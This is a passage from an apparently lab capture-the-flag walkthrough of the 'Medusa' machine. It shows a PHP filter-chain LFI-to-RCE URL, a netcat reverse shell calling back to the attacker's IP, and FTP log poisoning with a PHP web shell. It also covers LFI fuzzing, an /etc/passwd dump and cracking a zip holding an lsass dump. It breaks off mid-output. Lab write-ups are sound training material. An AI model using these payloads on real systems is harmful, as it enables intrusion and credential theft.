class=\"language-bash\">http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert
.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&amp;0=whoami<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753487.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753487.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426165204631\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try for a reverse shell!!!<\/p>\n<pre><code class=\"language-bash\">http:\/\/dev.medusa.hmv\/files\/system.php?view=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM94
3|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&amp;0=nc%20-e%20\/bin\/bash%20192.168.0.143%201234<\/code><\/pre>\n<p>Got a shell!!!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753488.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753488.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426165312964\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Method 2: FTP log injection<\/h3>\n<p>Up to now we have not used the FTP service at all, but it turns out to be useful here: fuzzing again shows a special log file that we can make use of:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ffuf -u &quot;http:\/\/dev.medusa.hmv\/files\/system.php?view=FUZZ&quot; -w \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-LFISuite-pathtotest.txt -fs 0 \n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/dev.medusa.hmv\/files\/system.php?view=FUZZ\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-LFISuite-pathtotest.txt\n :: 
Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 0\n________________________________________________\n\n\/proc\/self\/status       [Status: 200, Size: 1327, Words: 92, Lines: 57, Duration: 4ms]\n\/proc\/self\/stat         [Status: 200, Size: 318, Words: 52, Lines: 2, Duration: 4ms]\n\/proc\/self\/cmdline      [Status: 200, Size: 27, Words: 1, Lines: 1, Duration: 5ms]\n\/etc\/group              [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 8ms]\n..\/..\/..\/..\/etc\/passwd  [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd [Status: 200, Size: 1452, Words: 14, Lines: 28, 
Duration: 4ms]\n\/var\/log\/vsftpd.log     [Status: 200, Size: 933, Words: 115, Lines: 13, Duration: 0ms]\n\/etc\/vsftpd.conf        [Status: 200, Size: 5850, Words: 806, Lines: 156, Duration: 0ms]\n..\/..\/..\/..\/etc\/group   [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 0ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 3ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 2ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 1ms]\n..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/group [Status: 200, Size: 758, Words: 1, Lines: 55, Duration: 3ms]\n:: Progress: [569\/569] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 31 ::<\/code><\/pre>\n<p><code>\/var\/log\/vsftpd.log<\/code> is the FTP login log, so we try injecting malicious code:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ftp 192.168.0.109                                                                                                              \nConnected to 192.168.0.109.\n220 (vsFTPd 3.0.3)\nName (192.168.0.109:kali): &lt;?php 
system($_GET[&#039;hack&#039;]); ?&gt;  \n331 Please specify the password.\nPassword: \n530 Login incorrect.\nftp: Login failed\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p>After that we can execute system commands!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753489.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753489.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426170326545\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>This means we can get a reverse shell whenever we like!<\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@medusa:\/var\/www\/dev\/files$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@medusa:\/var\/www\/dev\/files$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@medusa:\/var\/www\/dev\/files$ cd ..\n(remote) www-data@medusa:\/var\/www\/dev$ cd ..\n(remote) www-data@medusa:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x  4 root root 4096 Jan 15  2023 .\ndrwxr-xr-x 12 root root 4096 Jan 15  2023 ..\ndrwxr-xr-x  5 root root 4096 Jan 19  2023 dev\ndrwxr-xr-x  3 root root 4096 Jan 19  2023 html\n(remote) www-data@medusa:\/var\/www$ cd ..\/  \n(remote) www-data@medusa:\/var$ ls -la\ntotal 48\ndrwxr-xr-x 12 root root  4096 Jan 15  2023 .\ndrwxr-xr-x 19 root root  4096 Jan 15  2023 ..\ndrwxr-xr-x  2 root root  4096 Jan 17  2023 backups\ndrwxr-xr-x 11 root root  4096 Jan 15  2023 cache\ndrwxr-xr-x 25 root root  4096 Jan 15  2023 lib\ndrwxrwsr-x  2 root staff 4096 Sep  3  2022 local\nlrwxrwxrwx  1 root root     9 Jan 15  2023 lock -&gt; \/run\/lock\ndrwxr-xr-x  8 root root  4096 Apr 26 04:03 log\ndrwxrwsr-x  2 root mail  4096 Jan 15  2023 mail\ndrwxr-xr-x  2 root root  4096 Jan 15  2023 opt\nlrwxrwxrwx  1 root root     4 Jan 15  2023 run -&gt; \/run\ndrwxr-xr-x  4 root root  4096 Jan 15  2023 spool\ndrwxrwxrwt  2 root root  4096 Apr 26 04:03 tmp\ndrwxr-xr-x  4 root root  4096 Jan 15  2023 www\n(remote) www-data@medusa:\/var$ cd backups\/\n(remote) www-data@medusa:\/var\/backups$ ls -la\ntotal 408\ndrwxr-xr-x  2 root root   4096 Jan 17  2023 .\ndrwxr-xr-x 12 root root   4096 Jan 15  2023 ..\n-rw-r--r--  1 root root  40960 Jan 17  2023 alternatives.tar.0\n-rw-r--r--  1 root root   8525 Jan 15  2023 apt.extended_states.0\n-rw-r--r--  1 root root      0 Jan 17  2023 dpkg.arch.0\n-rw-r--r--  1 root root    186 Jan 15  2023 dpkg.diversions.0\n-rw-r--r--  1 root root    172 Jan 15  2023 dpkg.statoverride.0\n-rw-r--r--  1 root root 346068 Jan 15  2023 dpkg.status.0\n(remote) 
www-data@medusa:\/var\/backups$ cd ..\/mail\n(remote) www-data@medusa:\/var\/mail$ ls -la\ntotal 8\ndrwxrwsr-x  2 root mail 4096 Jan 15  2023 .\ndrwxr-xr-x 12 root root 4096 Jan 15  2023 ..\n(remote) www-data@medusa:\/var\/mail$ cd \/home\n(remote) www-data@medusa:\/home$ ls\nspectre\n(remote) www-data@medusa:\/home$ cd spectre\/\n(remote) www-data@medusa:\/home\/spectre$ ls -la\ntotal 32\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .\ndrwxr-xr-x 3 root    root    4096 Jan 15  2023 ..\n-rw------- 1 spectre spectre  197 Jan 21  2023 .bash_history\n-rw-r--r-- 1 spectre spectre  220 Jan 15  2023 .bash_logout\n-rw-r--r-- 1 spectre spectre 3526 Jan 15  2023 .bashrc\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .local\n-rw-r--r-- 1 spectre spectre  807 Jan 15  2023 .profile\n-rw------- 1 spectre spectre   44 Jan 18  2023 user.txt\n(remote) www-data@medusa:\/home\/spectre$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network 
Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nspectre:x:1000:1000:spectre,,,:\/home\/spectre:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:106:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\n(remote) www-data@medusa:\/home\/spectre$ cd ..\/\n(remote) www-data@medusa:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root    root    4096 Jan 15  2023 .\ndrwxr-xr-x 19 root    root    4096 Jan 15  2023 ..\ndrwxr-xr-x  3 spectre spectre 4096 Jan 18  2023 spectre\n(remote) www-data@medusa:\/home$ cd \/\n(remote) www-data@medusa:\/$ ls -la\ntotal 72\ndrwxr-xr-x  19 root root  4096 Jan 15  2023 .\ndrwxr-xr-x  19 root root  4096 Jan 15  2023 ..\ndrwxr-xr-x   2 root root  4096 Jan 18  2023 ...\nlrwxrwxrwx   1 root root     7 Jan 15  2023 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 boot\ndrwxr-xr-x  17 root root  3140 Apr 26 04:03 dev\ndrwxr-xr-x  71 root root  4096 Apr 26 04:03 etc\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 home\nlrwxrwxrwx   1 root root    31 Jan 15  2023 initrd.img -&gt; boot\/initrd.img-5.10.0-20-amd64\nlrwxrwxrwx   1 root root    31 Jan 15  2023 initrd.img.old -&gt; boot\/initrd.img-5.10.0-18-amd64\nlrwxrwxrwx   1 root root     7 Jan 15  2023 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Jan 15  2023 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root     9 Jan 15  2023 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root    10 Jan 15  2023 libx32 -&gt; usr\/libx32\ndrwx------   2 root root 16384 Jan 15  2023 lost+found\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 media\ndrwxr-xr-x   2 root root  4096 Jan 15  2023 mnt\ndrwxr-xr-x   2 root root  4096 Jan 15  2023 opt\ndr-xr-xr-x 147 root root     0 Apr 26 
04:03 proc\ndrwx------   3 root root  4096 Jan 30  2023 root\ndrwxr-xr-x  19 root root   540 Apr 26 04:03 run\nlrwxrwxrwx   1 root root     8 Jan 15  2023 sbin -&gt; usr\/sbin\ndrwxr-xr-x   3 root root  4096 Jan 15  2023 srv\ndr-xr-xr-x  13 root root     0 Apr 26 04:03 sys\ndrwxrwxrwt   2 root root  4096 Apr 26 04:03 tmp\ndrwxr-xr-x  14 root root  4096 Jan 15  2023 usr\ndrwxr-xr-x  12 root root  4096 Jan 15  2023 var\nlrwxrwxrwx   1 root root    28 Jan 15  2023 vmlinuz -&gt; boot\/vmlinuz-5.10.0-20-amd64\nlrwxrwxrwx   1 root root    28 Jan 15  2023 vmlinuz.old -&gt; boot\/vmlinuz-5.10.0-18-amd64\n(remote) www-data@medusa:\/$ cd ...\n(remote) www-data@medusa:\/...$ ls -la\ntotal 12108\ndrwxr-xr-x  2 root     root         4096 Jan 18  2023 .\ndrwxr-xr-x 19 root     root         4096 Jan 15  2023 ..\n-rw-------  1 www-data www-data 12387024 Jan 18  2023 old_files.zip\n(remote) www-data@medusa:\/...$ ls -la\ntotal 12108\ndrwxr-xr-x  2 root     root         4096 Jan 18  2023 .\ndrwxr-xr-x 19 root     root         4096 Jan 15  2023 ..\n-rw-------  1 www-data www-data 12387024 Jan 18  2023 old_files.zip<\/code><\/pre>\n<h3>Probing for sensitive files<\/h3>\n<p>Unzip it and see whether there is anything interesting inside:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@medusa:\/...$ unzip old_files.zip \nbash: unzip: command not found<\/code><\/pre>\n<p>Hmm, let's transfer it over and unzip it locally:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ls\nold_files.zip\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ unzip old_files.zip \nArchive:  old_files.zip\n   skipping: lsass.DMP               need PK compat. 
v5.1 (can do v4.6)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ fcrackzip -u -D -p \/usr\/share\/wordlists\/rockyou.txt old_files.zip \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ file old_files.zip                                               \nold_files.zip: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ exiftool old_files.zip \nExifTool Version Number         : 12.76\nFile Name                       : old_files.zip\nDirectory                       : .\nFile Size                       : 12 MB\nFile Modification Date\/Time     : 2024:04:26 05:09:53-04:00\nFile Access Date\/Time           : 2024:04:26 05:10:07-04:00\nFile Inode Change Date\/Time     : 2024:04:26 05:09:53-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : ZIP\nFile Type Extension             : zip\nMIME Type                       : application\/zip\nZip Required Version            : 819\nZip Bit Flag                    : 0x0001\nZip Compression                 : Unknown (99)\nZip Modify Date                 : 2023:01:17 15:12:42\nZip CRC                         : 0x00000000\nZip Compressed Size             : 12386850\nZip Uncompressed Size           : 34804383\nZip File Name                   : lsass.DMP<\/code><\/pre>\n<p>Try cracking it with <code>john<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ zip2john old_files.zip &gt; hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256\/256 AVX2 8x])\nCost 1 (HMAC size) is 12386830 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key 
